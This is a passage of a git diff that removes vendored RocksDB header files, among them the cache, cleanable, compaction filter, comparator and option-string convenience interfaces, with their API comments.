-rocksdb_optimistictransaction_options_set_set_snapshot(
-    rocksdb_optimistictransaction_options_t* opt, unsigned char v);
-
-// referring to convention (3), this should be used by client
-// to free memory that was malloc()ed
-extern ROCKSDB_LIBRARY_API void rocksdb_free(void* ptr);
-
-extern ROCKSDB_LIBRARY_API rocksdb_pinnableslice_t* rocksdb_get_pinned(
-    rocksdb_t* db, const rocksdb_readoptions_t* options, const char* key,
-    size_t keylen, char** errptr);
-extern ROCKSDB_LIBRARY_API rocksdb_pinnableslice_t* rocksdb_get_pinned_cf(
-    rocksdb_t* db, const rocksdb_readoptions_t* options,
-    rocksdb_column_family_handle_t* column_family, const char* key,
-    size_t keylen, char** errptr);
-extern ROCKSDB_LIBRARY_API void rocksdb_pinnableslice_destroy(
-    rocksdb_pinnableslice_t* v);
-extern ROCKSDB_LIBRARY_API const char* rocksdb_pinnableslice_value(
-    const rocksdb_pinnableslice_t* t, size_t* vlen);
-
-#ifdef __cplusplus
-}  /* end extern "C" */
-#endif
-
-#endif  /* STORAGE_ROCKSDB_INCLUDE_C_H_ */
diff --git a/thirdparty/rocksdb/include/rocksdb/cache.h b/thirdparty/rocksdb/include/rocksdb/cache.h
deleted file mode 100644
index 5ebd66b..0000000
--- a/thirdparty/rocksdb/include/rocksdb/cache.h
+++ /dev/null
@@ -1,200 +0,0 @@
-// Copyright (c) 2011-present, Facebook, Inc.  All rights reserved.
-//  This source code is licensed under both the GPLv2 (found in the
-//  COPYING file in the root directory) and Apache 2.0 License
-//  (found in the LICENSE.Apache file in the root directory).
-//
-// Copyright (c) 2011 The LevelDB Authors. All rights reserved.
-// Use of this source code is governed by a BSD-style license that can be
-// found in the LICENSE file. See the AUTHORS file for names of contributors.
-//
-// A Cache is an interface that maps keys to values.  It has internal
-// synchronization and may be safely accessed concurrently from
-// multiple threads.  It may automatically evict entries to make room
-// for new entries.  Values have a specified charge against the cache
-// capacity.  For example, a cache where the values are variable
-// length strings, may use the length of the string as the charge for
-// the string.
-//
-// A builtin cache implementation with a least-recently-used eviction
-// policy is provided.  Clients may use their own implementations if
-// they want something more sophisticated (like scan-resistance, a
-// custom eviction policy, variable cache sizing, etc.)
-
-#pragma once
-
-#include <stdint.h>
-#include <memory>
-#include <string>
-#include "rocksdb/slice.h"
-#include "rocksdb/statistics.h"
-#include "rocksdb/status.h"
-
-namespace rocksdb {
-
-class Cache;
-
-// Create a new cache with a fixed size capacity. The cache is sharded
-// to 2^num_shard_bits shards, by hash of the key. The total capacity
-// is divided and evenly assigned to each shard. If strict_capacity_limit
-// is set, insert to the cache will fail when cache is full. User can also
-// set percentage of the cache reserves for high priority entries via
-// high_pri_pool_pct.
-// num_shard_bits = -1 means it is automatically determined: every shard
-// will be at least 512KB and number of shard bits will not exceed 6.
-extern std::shared_ptr<Cache> NewLRUCache(size_t capacity,
-                                          int num_shard_bits = -1,
-                                          bool strict_capacity_limit = false,
-                                          double high_pri_pool_ratio = 0.0);
-
-// Similar to NewLRUCache, but create a cache based on CLOCK algorithm with
-// better concurrent performance in some cases. See util/clock_cache.cc for
-// more detail.
-//
-// Return nullptr if it is not supported.
-extern std::shared_ptr<Cache> NewClockCache(size_t capacity,
-                                            int num_shard_bits = -1,
-                                            bool strict_capacity_limit = false);
-
-class Cache {
- public:
-  // Depending on implementation, cache entries with high priority could be less
-  // likely to get evicted than low priority entries.
-  enum class Priority { HIGH, LOW };
-
-  Cache() {}
-
-  // Destroys all existing entries by calling the "deleter"
-  // function that was passed via the Insert() function.
-  //
-  // @See Insert
-  virtual ~Cache() {}
-
-  // Opaque handle to an entry stored in the cache.
-  struct Handle {};
-
-  // The type of the Cache
-  virtual const char* Name() const = 0;
-
-  // Insert a mapping from key->value into the cache and assign it
-  // the specified charge against the total cache capacity.
-  // If strict_capacity_limit is true and cache reaches its full capacity,
-  // return Status::Incomplete.
-  //
-  // If handle is not nullptr, returns a handle that corresponds to the
-  // mapping. The caller must call this->Release(handle) when the returned
-  // mapping is no longer needed. In case of error caller is responsible to
-  // cleanup the value (i.e. calling "deleter").
-  //
-  // If handle is nullptr, it is as if Release is called immediately after
-  // insert. In case of error value will be cleanup.
-  //
-  // When the inserted entry is no longer needed, the key and
-  // value will be passed to "deleter".
-  virtual Status Insert(const Slice& key, void* value, size_t charge,
-                        void (*deleter)(const Slice& key, void* value),
-                        Handle** handle = nullptr,
-                        Priority priority = Priority::LOW) = 0;
-
-  // If the cache has no mapping for "key", returns nullptr.
-  //
-  // Else return a handle that corresponds to the mapping.  The caller
-  // must call this->Release(handle) when the returned mapping is no
-  // longer needed.
-  // If stats is not nullptr, relative tickers could be used inside the
-  // function.
-  virtual Handle* Lookup(const Slice& key, Statistics* stats = nullptr) = 0;
-
-  // Increments the reference count for the handle if it refers to an entry in
-  // the cache. Returns true if refcount was incremented; otherwise, returns
-  // false.
-  // REQUIRES: handle must have been returned by a method on *this.
-  virtual bool Ref(Handle* handle) = 0;
-
-  /**
-   * Release a mapping returned by a previous Lookup(). A released entry might
-   * still  remain in cache in case it is later looked up by others. If
-   * force_erase is set then it also erase it from the cache if there is no
-   * other reference to  it. Erasing it should call the deleter function that
-   * was provided when the
-   * entry was inserted.
-   *
-   * Returns true if the entry was also erased.
-   */
-  // REQUIRES: handle must not have been released yet.
-  // REQUIRES: handle must have been returned by a method on *this.
-  virtual bool Release(Handle* handle, bool force_erase = false) = 0;
-
-  // Return the value encapsulated in a handle returned by a
-  // successful Lookup().
-  // REQUIRES: handle must not have been released yet.
-  // REQUIRES: handle must have been returned by a method on *this.
-  virtual void* Value(Handle* handle) = 0;
-
-  // If the cache contains entry for key, erase it.  Note that the
-  // underlying entry will be kept around until all existing handles
-  // to it have been released.
-  virtual void Erase(const Slice& key) = 0;
-  // Return a new numeric id.  May be used by multiple clients who are
-  // sharding the same cache to partition the key space.  Typically the
-  // client will allocate a new id at startup and prepend the id to
-  // its cache keys.
-  virtual uint64_t NewId() = 0;
-
-  // sets the maximum configured capacity of the cache. When the new
-  // capacity is less than the old capacity and the existing usage is
-  // greater than new capacity, the implementation will do its best job to
-  // purge the released entries from the cache in order to lower the usage
-  virtual void SetCapacity(size_t capacity) = 0;
-
-  // Set whether to return error on insertion when cache reaches its full
-  // capacity.
-  virtual void SetStrictCapacityLimit(bool strict_capacity_limit) = 0;
-
-  // Get the flag whether to return error on insertion when cache reaches its
-  // full capacity.
-  virtual bool HasStrictCapacityLimit() const = 0;
-
-  // returns the maximum configured capacity of the cache
-  virtual size_t GetCapacity() const = 0;
-
-  // returns the memory size for the entries residing in the cache.
-  virtual size_t GetUsage() const = 0;
-
-  // returns the memory size for a specific entry in the cache.
-  virtual size_t GetUsage(Handle* handle) const = 0;
-
-  // returns the memory size for the entries in use by the system
-  virtual size_t GetPinnedUsage() const = 0;
-
-  // Call this on shutdown if you want to speed it up. Cache will disown
-  // any underlying data and will not free it on delete. This call will leak
-  // memory - call this only if you're shutting down the process.
-  // Any attempts of using cache after this call will fail terribly.
-  // Always delete the DB object before calling this method!
-  virtual void DisownData(){
-      // default implementation is noop
-  };
-
-  // Apply callback to all entries in the cache
-  // If thread_safe is true, it will also lock the accesses. Otherwise, it will
-  // access the cache without the lock held
-  virtual void ApplyToAllCacheEntries(void (*callback)(void*, size_t),
-                                      bool thread_safe) = 0;
-
-  // Remove all entries.
-  // Prerequisite: no entry is referenced.
-  virtual void EraseUnRefEntries() = 0;
-
-  virtual std::string GetPrintableOptions() const { return ""; }
-
-  // Mark the last inserted object as being a raw data block. This will be used
-  // in tests. The default implementation does nothing.
-  virtual void TEST_mark_as_data_block(const Slice& key, size_t charge) {}
-
- private:
-  // No copying allowed
-  Cache(const Cache&);
-  Cache& operator=(const Cache&);
-};
-
-}  // namespace rocksdb
diff --git a/thirdparty/rocksdb/include/rocksdb/cleanable.h b/thirdparty/rocksdb/include/rocksdb/cleanable.h
deleted file mode 100644
index cd2e942..0000000
--- a/thirdparty/rocksdb/include/rocksdb/cleanable.h
+++ /dev/null
@@ -1,82 +0,0 @@
-// Copyright (c) 2011-present, Facebook, Inc.  All rights reserved.
-//  This source code is licensed under both the GPLv2 (found in the
-//  COPYING file in the root directory) and Apache 2.0 License
-//  (found in the LICENSE.Apache file in the root directory).
-// Copyright (c) 2011 The LevelDB Authors. All rights reserved.
-// Use of this source code is governed by a BSD-style license that can be
-// found in the LICENSE file. See the AUTHORS file for names of contributors.
-//
-// An iterator yields a sequence of key/value pairs from a source.
-// The following class defines the interface.  Multiple implementations
-// are provided by this library.  In particular, iterators are provided
-// to access the contents of a Table or a DB.
-//
-// Multiple threads can invoke const methods on an Iterator without
-// external synchronization, but if any of the threads may call a
-// non-const method, all threads accessing the same Iterator must use
-// external synchronization.
-
-#ifndef INCLUDE_ROCKSDB_CLEANABLE_H_
-#define INCLUDE_ROCKSDB_CLEANABLE_H_
-
-namespace rocksdb {
-
-class Cleanable {
- public:
-  Cleanable();
-  ~Cleanable();
-
-  // No copy constructor and copy assignment allowed.
-  Cleanable(Cleanable&) = delete;
-  Cleanable& operator=(Cleanable&) = delete;
-
-  // Move consturctor and move assignment is allowed.
-  Cleanable(Cleanable&&);
-  Cleanable& operator=(Cleanable&&);
-
-  // Clients are allowed to register function/arg1/arg2 triples that
-  // will be invoked when this iterator is destroyed.
-  //
-  // Note that unlike all of the preceding methods, this method is
-  // not abstract and therefore clients should not override it.
-  typedef void (*CleanupFunction)(void* arg1, void* arg2);
-  void RegisterCleanup(CleanupFunction function, void* arg1, void* arg2);
-  void DelegateCleanupsTo(Cleanable* other);
-  // DoCleanup and also resets the pointers for reuse
-  inline void Reset() {
-    DoCleanup();
-    cleanup_.function = nullptr;
-    cleanup_.next = nullptr;
-  }
-
- protected:
-  struct Cleanup {
-    CleanupFunction function;
-    void* arg1;
-    void* arg2;
-    Cleanup* next;
-  };
-  Cleanup cleanup_;
-  // It also becomes the owner of c
-  void RegisterCleanup(Cleanup* c);
-
- private:
-  // Performs all the cleanups. It does not reset the pointers. Making it
-  // private
-  // to prevent misuse
-  inline void DoCleanup() {
-    if (cleanup_.function != nullptr) {
-      (*cleanup_.function)(cleanup_.arg1, cleanup_.arg2);
-      for (Cleanup* c = cleanup_.next; c != nullptr;) {
-        (*c->function)(c->arg1, c->arg2);
-        Cleanup* next = c->next;
-        delete c;
-        c = next;
-      }
-    }
-  }
-};
-
-}  // namespace rocksdb
-
-#endif  // INCLUDE_ROCKSDB_CLEANABLE_H_
diff --git a/thirdparty/rocksdb/include/rocksdb/compaction_filter.h b/thirdparty/rocksdb/include/rocksdb/compaction_filter.h
deleted file mode 100644
index 64f61a3..0000000
--- a/thirdparty/rocksdb/include/rocksdb/compaction_filter.h
+++ /dev/null
@@ -1,212 +0,0 @@
-// Copyright (c) 2011-present, Facebook, Inc.  All rights reserved.
-//  This source code is licensed under both the GPLv2 (found in the
-//  COPYING file in the root directory) and Apache 2.0 License
-//  (found in the LICENSE.Apache file in the root directory).
-// Copyright (c) 2013 The LevelDB Authors. All rights reserved.
-// Use of this source code is governed by a BSD-style license that can be
-// found in the LICENSE file. See the AUTHORS file for names of contributors.
-
-#ifndef STORAGE_ROCKSDB_INCLUDE_COMPACTION_FILTER_H_
-#define STORAGE_ROCKSDB_INCLUDE_COMPACTION_FILTER_H_
-
-#include <cassert>
-#include <memory>
-#include <string>
-#include <vector>
-
-namespace rocksdb {
-
-class Slice;
-class SliceTransform;
-
-// Context information of a compaction run
-struct CompactionFilterContext {
-  // Does this compaction run include all data files
-  bool is_full_compaction;
-  // Is this compaction requested by the client (true),
-  // or is it occurring as an automatic compaction process
-  bool is_manual_compaction;
-};
-
-// CompactionFilter allows an application to modify/delete a key-value at
-// the time of compaction.
-
-class CompactionFilter {
- public:
-  enum ValueType {
-    kValue,
-    kMergeOperand,
-    kBlobIndex,  // used internally by BlobDB.
-  };
-
-  enum class Decision {
-    kKeep,
-    kRemove,
-    kChangeValue,
-    kRemoveAndSkipUntil,
-  };
-
-  // Context information of a compaction run
-  struct Context {
-    // Does this compaction run include all data files
-    bool is_full_compaction;
-    // Is this compaction requested by the client (true),
-    // or is it occurring as an automatic compaction process
-    bool is_manual_compaction;
-    // Which column family this compaction is for.
-    uint32_t column_family_id;
-  };
-
-  virtual ~CompactionFilter() {}
-
-  // The compaction process invokes this
-  // method for kv that is being compacted. A return value
-  // of false indicates that the kv should be preserved in the
-  // output of this compaction run and a return value of true
-  // indicates that this key-value should be removed from the
-  // output of the compaction.  The application can inspect
-  // the existing value of the key and make decision based on it.
-  //
-  // Key-Values that are results of merge operation during compaction are not
-  // passed into this function. Currently, when you have a mix of Put()s and
-  // Merge()s on a same key, we only guarantee to process the merge operands
-  // through the compaction filters. Put()s might be processed, or might not.
-  //
-  // When the value is to be preserved, the application has the option
-  // to modify the existing_value and pass it back through new_value.
-  // value_changed needs to be set to true in this case.
-  //
-  // If you use snapshot feature of RocksDB (i.e. call GetSnapshot() API on a
-  // DB* object), CompactionFilter might not be very useful for you. Due to
-  // guarantees we need to maintain, compaction process will not call Filter()
-  // on any keys that were written before the latest snapshot. In other words,
-  // compaction will only call Filter() on keys written after your most recent
-  // call to GetSnapshot(). In most cases, Filter() will not be called very
-  // often. This is something we're fixing. See the discussion at:
-  // https://www.facebook.com/groups/mysqlonrocksdb/permalink/999723240091865/
-  //
-  // If multithreaded compaction is being used *and* a single CompactionFilter
-  // instance was supplied via Options::compaction_filter, this method may be
-  // called from different threads concurrently.  The application must ensure
-  // that the call is thread-safe.
-  //
-  // If the CompactionFilter was created by a factory, then it will only ever
-  // be used by a single thread that is doing the compaction run, and this
-  // call does not need to be thread-safe.  However, multiple filters may be
-  // in existence and operating concurrently.
-  //
-  // The last paragraph is not true if you set max_subcompactions to more than
-  // 1. In that case, subcompaction from multiple threads may call a single
-  // CompactionFilter concurrently.
-  virtual bool Filter(int level, const Slice& key, const Slice& existing_value,
-                      std::string* new_value, bool* value_changed) const {
-    return false;
-  }
-
-  // The compaction process invokes this method on every merge operand. If this
-  // method returns true, the merge operand will be ignored and not written out
-  // in the compaction output
-  //
-  // Note: If you are using a TransactionDB, it is not recommended to implement
-  // FilterMergeOperand().  If a Merge operation is filtered out, TransactionDB
-  // may not realize there is a write conflict and may allow a Transaction to
-  // Commit that should have failed.  Instead, it is better to implement any
-  // Merge filtering inside the MergeOperator.
-  virtual bool FilterMergeOperand(int level, const Slice& key,
-                                  const Slice& operand) const {
-    return false;
-  }
-
-  // An extended API. Called for both values and merge operands.
-  // Allows changing value and skipping ranges of keys.
-  // The default implementation uses Filter() and FilterMergeOperand().
-  // If you're overriding this method, no need to override the other two.
-  // `value_type` indicates whether this key-value corresponds to a normal
-  // value (e.g. written with Put())  or a merge operand (written with Merge()).
-  //
-  // Possible return values:
-  //  * kKeep - keep the key-value pair.
-  //  * kRemove - remove the key-value pair or merge operand.
-  //  * kChangeValue - keep the key and change the value/operand to *new_value.
-  //  * kRemoveAndSkipUntil - remove this key-value pair, and also remove
-  //      all key-value pairs with key in [key, *skip_until). This range
-  //      of keys will be skipped without reading, potentially saving some
-  //      IO operations compared to removing the keys one by one.
-  //
-  //      *skip_until <= key is treated the same as Decision::kKeep
-  //      (since the range [key, *skip_until) is empty).
-  //
-  //      Caveats:
-  //       - The keys are skipped even if there are snapshots containing them,
-  //         as if IgnoreSnapshots() was true; i.e. values removed
-  //         by kRemoveAndSkipUntil can disappear from a snapshot - beware
-  //         if you're using TransactionDB or DB::GetSnapshot().
-  //       - If value for a key was overwritten or merged into (multiple Put()s
-  //         or Merge()s), and compaction filter skips this key with
-  //         kRemoveAndSkipUntil, it's possible that it will remove only
-  //         the new value, exposing the old value that was supposed to be
-  //         overwritten.
-  //       - Doesn't work with PlainTableFactory in prefix mode.
-  //       - If you use kRemoveAndSkipUntil, consider also reducing
-  //         compaction_readahead_size option.
-  //
-  // Note: If you are using a TransactionDB, it is not recommended to filter
-  // out or modify merge operands (ValueType::kMergeOperand).
-  // If a merge operation is filtered out, TransactionDB may not realize there
-  // is a write conflict and may allow a Transaction to Commit that should have
-  // failed. Instead, it is better to implement any Merge filtering inside the
-  // MergeOperator.
-  virtual Decision FilterV2(int level, const Slice& key, ValueType value_type,
-                            const Slice& existing_value, std::string* new_value,
-                            std::string* skip_until) const {
-    switch (value_type) {
-      case ValueType::kValue: {
-        bool value_changed = false;
-        bool rv = Filter(level, key, existing_value, new_value, &value_changed);
-        if (rv) {
-          return Decision::kRemove;
-        }
-        return value_changed ? Decision::kChangeValue : Decision::kKeep;
-      }
-      case ValueType::kMergeOperand: {
-        bool rv = FilterMergeOperand(level, key, existing_value);
-        return rv ? Decision::kRemove : Decision::kKeep;
-      }
-      case ValueType::kBlobIndex:
-        return Decision::kKeep;
-    }
-    assert(false);
-    return Decision::kKeep;
-  }
-
-  // By default, compaction will only call Filter() on keys written after the
-  // most recent call to GetSnapshot(). However, if the compaction filter
-  // overrides IgnoreSnapshots to make it return true, the compaction filter
-  // will be called even if the keys were written before the last snapshot.
-  // This behavior is to be used only when we want to delete a set of keys
-  // irrespective of snapshots. In particular, care should be taken
-  // to understand that the values of these keys will change even if we are
-  // using a snapshot.
-  virtual bool IgnoreSnapshots() const { return false; }
-
-  // Returns a name that identifies this compaction filter.
-  // The name will be printed to LOG file on start up for diagnosis.
-  virtual const char* Name() const = 0;
-};
-
-// Each compaction will create a new CompactionFilter allowing the
-// application to know about different compactions
-class CompactionFilterFactory {
- public:
-  virtual ~CompactionFilterFactory() { }
-
-  virtual std::unique_ptr<CompactionFilter> CreateCompactionFilter(
-      const CompactionFilter::Context& context) = 0;
-
-  // Returns a name that identifies this compaction filter factory.
-  virtual const char* Name() const = 0;
-};
-
-}  // namespace rocksdb
-
-#endif  // STORAGE_ROCKSDB_INCLUDE_COMPACTION_FILTER_H_
diff --git a/thirdparty/rocksdb/include/rocksdb/compaction_job_stats.h b/thirdparty/rocksdb/include/rocksdb/compaction_job_stats.h
deleted file mode 100644
index ebb04a4..0000000
--- a/thirdparty/rocksdb/include/rocksdb/compaction_job_stats.h
+++ /dev/null
@@ -1,91 +0,0 @@
-// Copyright (c) 2011-present, Facebook, Inc.  All rights reserved.
-//  This source code is licensed under both the GPLv2 (found in the
-//  COPYING file in the root directory) and Apache 2.0 License
-//  (found in the LICENSE.Apache file in the root directory).
-
-#pragma once
-#include <stddef.h>
-#include <stdint.h>
-#include <string>
-
-namespace rocksdb {
-struct CompactionJobStats {
-  CompactionJobStats() { Reset(); }
-  void Reset();
-  // Aggregate the CompactionJobStats from another instance with this one
-  void Add(const CompactionJobStats& stats);
-
-  // the elapsed time of this compaction in microseconds.
-  uint64_t elapsed_micros;
-
-  // the number of compaction input records.
-  uint64_t num_input_records;
-  // the number of compaction input files.
-  size_t num_input_files;
-  // the number of compaction input files at the output level.
-  size_t num_input_files_at_output_level;
-
-  // the number of compaction output records.
-  uint64_t num_output_records;
-  // the number of compaction output files.
-  size_t num_output_files;
-
-  // true if the compaction is a manual compaction
-  bool is_manual_compaction;
-
-  // the size of the compaction input in bytes.
-  uint64_t total_input_bytes;
-  // the size of the compaction output in bytes.
-  uint64_t total_output_bytes;
-
-  // number of records being replaced by newer record associated with same key.
-  // this could be a new value or a deletion entry for that key so this field
-  // sums up all updated and deleted keys
-  uint64_t num_records_replaced;
-
-  // the sum of the uncompressed input keys in bytes.
-  uint64_t total_input_raw_key_bytes;
-  // the sum of the uncompressed input values in bytes.
-  uint64_t total_input_raw_value_bytes;
-
-  // the number of deletion entries before compaction. Deletion entries
-  // can disappear after compaction because they expired
-  uint64_t num_input_deletion_records;
-  // number of deletion records that were found obsolete and discarded
-  // because it is not possible to delete any more keys with this entry
-  // (i.e. all possible deletions resulting from it have been completed)
-  uint64_t num_expired_deletion_records;
-
-  // number of corrupt keys (ParseInternalKey returned false when applied to
-  // the key) encountered and written out.
-  uint64_t num_corrupt_keys;
-
-  // Following counters are only populated if
-  // options.report_bg_io_stats = true;
-
-  // Time spent on file's Append() call.
-  uint64_t file_write_nanos;
-
-  // Time spent on sync file range.
-  uint64_t file_range_sync_nanos;
-
-  // Time spent on file fsync.
-  uint64_t file_fsync_nanos;
-
-  // Time spent on preparing file write (falocate, etc)
-  uint64_t file_prepare_write_nanos;
-
-  // 0-terminated strings storing the first 8 bytes of the smallest and
-  // largest key in the output.
-  static const size_t kMaxPrefixLength = 8;
-
-  std::string smallest_output_key_prefix;
-  std::string largest_output_key_prefix;
-
-  // number of single-deletes which do not meet a put
-  uint64_t num_single_del_fallthru;
-
-  // number of single-deletes which meet something other than a put
-  uint64_t num_single_del_mismatch;
-};
-}  // namespace rocksdb
diff --git a/thirdparty/rocksdb/include/rocksdb/comparator.h b/thirdparty/rocksdb/include/rocksdb/comparator.h
deleted file mode 100644
index 64db73a..0000000
--- a/thirdparty/rocksdb/include/rocksdb/comparator.h
+++ /dev/null
@@ -1,84 +0,0 @@
-// Copyright (c) 2011-present, Facebook, Inc.  All rights reserved.
-//  This source code is licensed under both the GPLv2 (found in the
-//  COPYING file in the root directory) and Apache 2.0 License
-//  (found in the LICENSE.Apache file in the root directory).
-// Copyright (c) 2011 The LevelDB Authors. All rights reserved.
-// Use of this source code is governed by a BSD-style license that can be
-// found in the LICENSE file. See the AUTHORS file for names of contributors.
-
-#ifndef STORAGE_ROCKSDB_INCLUDE_COMPARATOR_H_
-#define STORAGE_ROCKSDB_INCLUDE_COMPARATOR_H_
-
-#include <string>
-
-namespace rocksdb {
-
-class Slice;
-
-// A Comparator object provides a total order across slices that are
-// used as keys in an sstable or a database.  A Comparator implementation
-// must be thread-safe since rocksdb may invoke its methods concurrently
-// from multiple threads.
-class Comparator {
- public:
-  virtual ~Comparator();
-
-  // Three-way comparison.  Returns value:
-  //   < 0 iff "a" < "b",
-  //   == 0 iff "a" == "b",
-  //   > 0 iff "a" > "b"
-  virtual int Compare(const Slice& a, const Slice& b) const = 0;
-
-  // Compares two slices for equality. The following invariant should always
-  // hold (and is the default implementation):
-  //   Equal(a, b) iff Compare(a, b) == 0
-  // Overwrite only if equality comparisons can be done more efficiently than
-  // three-way comparisons.
-  virtual bool Equal(const Slice& a, const Slice& b) const {
-    return Compare(a, b) == 0;
-  }
-
-  // The name of the comparator.  Used to check for comparator
-  // mismatches (i.e., a DB created with one comparator is
-  // accessed using a different comparator.
-  //
-  // The client of this package should switch to a new name whenever
-  // the comparator implementation changes in a way that will cause
-  // the relative ordering of any two keys to change.
-  //
-  // Names starting with "rocksdb." are reserved and should not be used
-  // by any clients of this package.
-  virtual const char* Name() const = 0;
-
-  // Advanced functions: these are used to reduce the space requirements
-  // for internal data structures like index blocks.
-
-  // If *start < limit, changes *start to a short string in [start,limit).
-  // Simple comparator implementations may return with *start unchanged,
-  // i.e., an implementation of this method that does nothing is correct.
-  virtual void FindShortestSeparator(
-      std::string* start,
-      const Slice& limit) const = 0;
-
-  // Changes *key to a short string >= *key.
-  // Simple comparator implementations may return with *key unchanged,
-  // i.e., an implementation of this method that does nothing is correct.
-  virtual void FindShortSuccessor(std::string* key) const = 0;
-
-  // if it is a wrapped comparator, may return the root one.
-  // return itself it is not wrapped.
-  virtual const Comparator* GetRootComparator() const { return this; }
-};
-
-// Return a builtin comparator that uses lexicographic byte-wise
-// ordering.  The result remains the property of this module and
-// must not be deleted.
-extern const Comparator* BytewiseComparator();
-
-// Return a builtin comparator that uses reverse lexicographic byte-wise
-// ordering.
-extern const Comparator* ReverseBytewiseComparator();
-
-}  // namespace rocksdb
-
-#endif  // STORAGE_ROCKSDB_INCLUDE_COMPARATOR_H_
diff --git a/thirdparty/rocksdb/include/rocksdb/convenience.h b/thirdparty/rocksdb/include/rocksdb/convenience.h
deleted file mode 100644
index 4a60afb..0000000
--- a/thirdparty/rocksdb/include/rocksdb/convenience.h
+++ /dev/null
@@ -1,339 +0,0 @@
-// Copyright (c) 2011-present, Facebook, Inc.  All rights reserved.
-//  This source code is licensed under both the GPLv2 (found in the
-//  COPYING file in the root directory) and Apache 2.0 License
-//  (found in the LICENSE.Apache file in the root directory).
-
-#pragma once
-
-#include <string>
-#include <unordered_map>
-#include <vector>
-
-#include "rocksdb/db.h"
-#include "rocksdb/options.h"
-#include "rocksdb/table.h"
-
-namespace rocksdb {
-
-#ifndef ROCKSDB_LITE
-// The following set of functions provide a way to construct RocksDB Options
-// from a string or a string-to-string map.  Here're the general rule of
-// setting option values from strings by type.  Some RocksDB types are also
-// supported in these APIs.  Please refer to the comment of the function itself
-// to find more information about how to config those RocksDB types.
-//
-// * Strings:
-//   Strings will be used as values directly without any truncating or
-//   trimming.
-//
-// * Booleans:
-//   - "true" or "1" => true
-//   - "false" or "0" => false.
-//   [Example]:
-//   - {"optimize_filters_for_hits", "1"} in GetColumnFamilyOptionsFromMap, or
-//   - "optimize_filters_for_hits=true" in GetColumnFamilyOptionsFromString.
-//
-// * Integers:
-//   Integers are converted directly from string, in addition to the following
-//   units that we support:
-//   - 'k' or 'K' => 2^10
-//   - 'm' or 'M' => 2^20
-//   - 'g' or 'G' => 2^30
-//   - 't' or 'T' => 2^40  // only for unsigned int with sufficient bits.
-//   [Example]:
-//   - {"arena_block_size", "19G"} in GetColumnFamilyOptionsFromMap, or
-//   - "arena_block_size=19G" in GetColumnFamilyOptionsFromString.
-//
-// * Doubles / Floating Points:
-//   Doubles / Floating Points are converted directly from string.  Note that
-//   currently we do not support units.
-//   [Example]:
-//   - {"hard_rate_limit", "2.1"} in GetColumnFamilyOptionsFromMap, or
-//   - "hard_rate_limit=2.1" in GetColumnFamilyOptionsFromString.
-// * Array / Vectors:
-//   An array is specified by a list of values, where ':' is used as
-//   the delimiter to separate each value.
-//   [Example]:
-//   - {"compression_per_level", "kNoCompression:kSnappyCompression"}
-//     in GetColumnFamilyOptionsFromMap, or
-//   - "compression_per_level=kNoCompression:kSnappyCompression" in
-//     GetColumnFamilyOptionsFromMapString
-// * Enums:
-//   The valid values of each enum are identical to the names of its constants.
-//   [Example]:
-//   - CompressionType: valid values are "kNoCompression",
-//     "kSnappyCompression", "kZlibCompression", "kBZip2Compression", ...
-//   - CompactionStyle: valid values are "kCompactionStyleLevel",
-//     "kCompactionStyleUniversal", "kCompactionStyleFIFO", and
-//     "kCompactionStyleNone".
-//
-
-// Take a default ColumnFamilyOptions "base_options" in addition to a
-// map "opts_map" of option name to option value to construct the new
-// ColumnFamilyOptions "new_options".
-//
-// Below are the instructions of how to config some non-primitive-typed
-// options in ColumnFOptions:
-//
-// * table_factory:
-//   table_factory can be configured using our custom nested-option syntax.
-//
-//   {option_a=value_a; option_b=value_b; option_c=value_c; ... }
-//
-//   A nested option is enclosed by two curly braces, within which there are
-//   multiple option assignments.  Each assignment is of the form
-//   "variable_name=value;".
-//
-//   Currently we support the following types of TableFactory:
-//   - BlockBasedTableFactory:
-//     Use name "block_based_table_factory" to initialize table_factory with
-//     BlockBasedTableFactory.  Its BlockBasedTableFactoryOptions can be
-//     configured using the nested-option syntax.
-//     [Example]:
-//     * {"block_based_table_factory", "{block_cache=1M;block_size=4k;}"}
-//       is equivalent to assigning table_factory with a BlockBasedTableFactory
-//       that has 1M LRU block-cache with block size equals to 4k:
-//         ColumnFamilyOptions cf_opt;
-//         BlockBasedTableOptions blk_opt;
-//         blk_opt.block_cache = NewLRUCache(1 * 1024 * 1024);
-//         blk_opt.block_size = 4 * 1024;
-//         cf_opt.table_factory.reset(NewBlockBasedTableFactory(blk_opt));
-//   - PlainTableFactory:
-//     Use name "plain_table_factory" to initialize table_factory with
-//     PlainTableFactory.  Its PlainTableFactoryOptions can be configured using
-//     the nested-option syntax.
-//     [Example]:
-//     * {"plain_table_factory", "{user_key_len=66;bloom_bits_per_key=20;}"}
-//
-// * memtable_factory:
-//   Use "memtable" to config memtable_factory.  Here are the supported
-//   memtable factories:
-//   - SkipList:
-//     Pass "skip_list:<lookahead>" to config memtable to use SkipList,
-//     or simply "skip_list" to use the default SkipList.
-//     [Example]:
-//     * {"memtable", "skip_list:5"} is equivalent to setting
-//       memtable to SkipListFactory(5).
-//   - PrefixHash:
-//     Pass "prfix_hash:<hash_bucket_count>" to config memtable
-//     to use PrefixHash, or simply "prefix_hash" to use the default
-//     PrefixHash.
-//     [Example]:
-//     * {"memtable", "prefix_hash:1000"} is equivalent to setting
-//       memtable to NewHashSkipListRepFactory(hash_bucket_count).
-//   - HashLinkedList:
-//     Pass "hash_linkedlist:<hash_bucket_count>" to config memtable
-//     to use HashLinkedList, or simply "hash_linkedlist" to use the default
-//     HashLinkedList.
-//     [Example]:
-//     * {"memtable", "hash_linkedlist:1000"} is equivalent to
-//       setting memtable to NewHashLinkListRepFactory(1000).
-//   - VectorRepFactory:
-//     Pass "vector:<count>" to config memtable to use VectorRepFactory,
-//     or simply "vector" to use the default Vector memtable.
-//     [Example]:
-//     * {"memtable", "vector:1024"} is equivalent to setting memtable
-//       to VectorRepFactory(1024).
-//   - HashCuckooRepFactory:
-//     Pass "cuckoo:<write_buffer_size>" to use HashCuckooRepFactory with the
-//     specified write buffer size, or simply "cuckoo" to use the default
-//     HashCuckooRepFactory.
-//     [Example]:
-//     * {"memtable", "cuckoo:1024"} is equivalent to setting memtable
-//       to NewHashCuckooRepFactory(1024).
-//
-//  * compression_opts:
-//    Use "compression_opts" to config compression_opts.  The value format
-//    is of the form "<window_bits>:<level>:<strategy>:<max_dict_bytes>".
-//    [Example]:
-//    * {"compression_opts", "4:5:6:7"} is equivalent to setting:
-//        ColumnFamilyOptions cf_opt;
-//        cf_opt.compression_opts.window_bits = 4;
-//        cf_opt.compression_opts.level = 5;
-//        cf_opt.compression_opts.strategy = 6;
-//        cf_opt.compression_opts.max_dict_bytes = 7;
-//
-// @param base_options the default options of the output "new_options".
-// @param opts_map an option name to value map for specifying how "new_options"
